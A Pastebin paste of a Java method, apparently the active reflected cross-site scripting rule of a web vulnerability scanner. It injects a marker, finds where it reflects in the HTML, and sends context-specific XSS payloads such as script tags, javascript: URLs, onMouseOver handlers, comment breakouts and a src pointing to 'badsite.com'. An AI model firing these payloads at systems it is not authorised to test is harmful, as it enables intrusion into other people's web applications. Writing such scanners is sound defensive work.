Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- public void scan(HttpMessage msg, String param, String value) {
- try {
- // Inject the 'safe' eyecatcher and see where it appears
- boolean attackWorked = false;
- setParameter(msg, param, Constant.getEyeCatcher());
- sendAndReceive(msg);
- HtmlContextAnalyser hca = new HtmlContextAnalyser(msg);
- List<HtmlContext> contexts = hca.getHtmlContexts(Constant.getEyeCatcher(), null, 0);
- if (contexts.size() == 0) {
- // Lower case?
- contexts = hca.getHtmlContexts(Constant.getEyeCatcher().toLowerCase(), null, 0);
- }
- if (contexts.size() == 0) {
- // Upper case?
- contexts = hca.getHtmlContexts(Constant.getEyeCatcher().toUpperCase(), null, 0);
- }
- if (contexts.size() == 0) {
- // No luck - try again, appending the eyecatcher to the original value
- setParameter(msg, param, param + Constant.getEyeCatcher());
- sendAndReceive(msg);
- hca = new HtmlContextAnalyser(msg);
- contexts = hca.getHtmlContexts(value + Constant.getEyeCatcher(), null, 0);
- }
- if (contexts.size() == 0) {
- // No luck - lets just try a direct attack
- List<HtmlContext> contexts2 = performAttack (msg, param,
- "'\"<script>alert(1);</script>", null, 0);
- if (contexts2.size() > 0) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.SUSPICIOUS, null, param, contexts2.get(0).getTarget(),
- "", contexts2.get(0).getTarget(), contexts2.get(0).getMsg());
- attackWorked = true;
- }
- }
- for (HtmlContext context : contexts) {
- // Loop through the returned contexts and lauch targetted attacks
- if (attackWorked) {
- break;
- }
- if (context.getTagAttribute() != null) {
- // its in a tag attribute - lots of attack vectors possible
- if (context.isInScriptAttribute()) {
- // Good chance this will be vulnerable
- // Try a simple alert attack
- List<HtmlContext> contexts2 = performAttack (msg, param, ";alert(1)", context, 0);
- for (HtmlContext context2 : contexts2) {
- if (context2.getTagAttribute() != null &&
- context2.isInScriptAttribute()) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, context2.getTarget(),
- "", contexts2.get(0).getTarget(), context2.getMsg());
- attackWorked = true;
- break;
- }
- }
- if (!attackWorked) {
- log.debug("Failed to find vuln in script attribute on " + msg.getRequestHeader().getURI());
- }
- } else if (context.isInUrlAttribute()) {
- // Its a url attribute
- List<HtmlContext> contexts2 = performAttack (msg, param, "javascript:alert(1);", context, 0);
- for (HtmlContext ctx : contexts2) {
- if (ctx.isInUrlAttribute()) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, ctx.getTarget(),
- "", ctx.getTarget(), ctx.getMsg());
- attackWorked = true;
- break;
- }
- }
- if (!attackWorked) {
- log.debug("Failed to find vuln in url attribute on " + msg.getRequestHeader().getURI());
- }
- }
- if (! attackWorked && context.isInTagWithSrc()) {
- // Its in an attribute in a tag which supports src attributes
- List<HtmlContext> contexts2 = performAttack (msg, param,
- context.getSurroundingQuote() + " src=http://badsite.com", context, HtmlContext.IGNORE_TAG);
- if (contexts2.size() > 0) {
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, contexts2.get(0).getTarget(),
- "", contexts2.get(0).getTarget(), contexts2.get(0).getMsg());
- attackWorked = true;
- }
- if (!attackWorked) {
- log.debug("Failed to find vuln in tag with src attribute on " + msg.getRequestHeader().getURI());
- }
- }
- if (! attackWorked) {
- // Try a simple alert attack
- List<HtmlContext> contexts2 = performAttack (msg, param,
- context.getSurroundingQuote() + "><script>alert(1);</script>", context, HtmlContext.IGNORE_TAG);
- if (contexts2.size() > 0) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, contexts2.get(0).getTarget(),
- "", contexts2.get(0).getTarget(), contexts2.get(0).getMsg());
- attackWorked = true;
- }
- if (!attackWorked) {
- log.debug("Failed to find vuln with simple script attack " + msg.getRequestHeader().getURI());
- }
- }
- if (! attackWorked) {
- // Try adding an onMouseOver
- List<HtmlContext> contexts2 = performAttack (msg, param,
- context.getSurroundingQuote() + " onMouseOver=" + context.getSurroundingQuote() + "alert(1);",
- context, HtmlContext.IGNORE_TAG);
- if (contexts2.size() > 0) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, contexts2.get(0).getTarget(),
- "", contexts2.get(0).getTarget(), contexts2.get(0).getMsg());
- attackWorked = true;
- }
- if (!attackWorked) {
- log.debug("Failed to find vuln in with simple onmounseover " + msg.getRequestHeader().getURI());
- }
- }
- } else if (context.isHtmlComment()) {
- // Try breaking out of the comment
- List<HtmlContext> contexts2 = performAttack (msg, param,
- "--><script>alert(1);</script><!--", context, HtmlContext.IGNORE_HTML_COMMENT);
- if (contexts2.size() > 0) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, contexts2.get(0).getTarget(),
- "", contexts2.get(0).getTarget(), contexts2.get(0).getMsg());
- attackWorked = true;
- } else {
- // Maybe they're blocking script tags
- contexts2 = performAttack (msg, param,
- "--><b onMouseOver=alert(1);>test</b><!--", context, HtmlContext.IGNORE_HTML_COMMENT);
- if (contexts2.size() > 0) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, contexts2.get(0).getTarget(),
- "", contexts2.get(0).getTarget(), contexts2.get(0).getMsg());
- attackWorked = true;
- }
- }
- } else {
- // its not in a tag attribute
- if ("body".equalsIgnoreCase(context.getParentTag())) {
- // Immediately under a body tag
- // Try a simple alert attack
- List<HtmlContext> contexts2 = performAttack (msg, param,
- "<script>alert(1);</script>", null, HtmlContext.IGNORE_PARENT);
- if (contexts2.size() > 0) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, contexts2.get(0).getTarget(),
- "", contexts2.get(0).getTarget(), contexts2.get(0).getMsg());
- attackWorked = true;
- } else {
- // Maybe they're blocking script tags
- contexts2 = performAttack (msg, param,
- "<b onMouseOver=alert(1);>test</b>", context, HtmlContext.IGNORE_PARENT);
- for (HtmlContext context2 : contexts2) {
- if ("body".equalsIgnoreCase(context2.getParentTag()) ||
- "script".equalsIgnoreCase(context2.getParentTag())) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, contexts2.get(0).getTarget(),
- "TBI Body tag", contexts2.get(0).getTarget(), contexts2.get(0).getMsg());
- attackWorked = true;
- break;
- }
- }
- }
- } else if (context.getParentTag() != null){
- // Its not immediately under a body tag, try to close the tag
- List<HtmlContext> contexts2 = performAttack (msg, param,
- "</" + context.getParentTag() + "><script>alert(1);</script><" + context.getParentTag() + ">",
- context, HtmlContext.IGNORE_IN_SCRIPT);
- if (contexts2.size() > 0) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, contexts2.get(0).getTarget(),
- "", contexts2.get(0).getTarget(), contexts2.get(0).getMsg());
- attackWorked = true;
- } else if ("script".equalsIgnoreCase(context.getParentTag())){
- // its in a script tag...
- contexts2 = performAttack (msg, param,
- context.getSurroundingQuote() + ";alert(1);" + context.getSurroundingQuote(), context, 0);
- if (contexts2.size() > 0) {
- // Yep, its vulnerable
- bingo(Alert.RISK_HIGH, Alert.WARNING, null, param, contexts2.get(0).getTarget(),
- "", contexts2.get(0).getTarget(), contexts2.get(0).getMsg());
- attackWorked = true;
- }
- }
- }
- }
- }
- } catch (InvalidRedirectLocationException e) {
- // Not an error, just means we probably attacked the redirect location
- } catch (Exception e) {
- log.error(e.getMessage(), e);
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement